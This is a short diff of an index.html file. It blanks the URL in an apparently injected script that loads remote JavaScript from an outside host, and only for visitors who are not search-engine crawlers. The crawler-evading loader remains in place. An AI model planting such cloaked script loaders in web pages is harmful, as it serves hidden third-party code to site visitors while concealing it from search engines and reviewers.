--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
   
 </script>
 <script type="text/javascript">
-var dkdz='https://www.govyiwu.cn:12443/ty/7604C56E-FC83-13357-22-D9681790E933.alpha';
+var dkdz='';
 if(navigator.userAgent.match(/Baiduspider|Bytespider|YisouSpider|360Spider|gjuren123/i)==null){document.write('<script src="'+dkdz+'"><\/script>');}
 </script>
  <!--/禁止右键-->
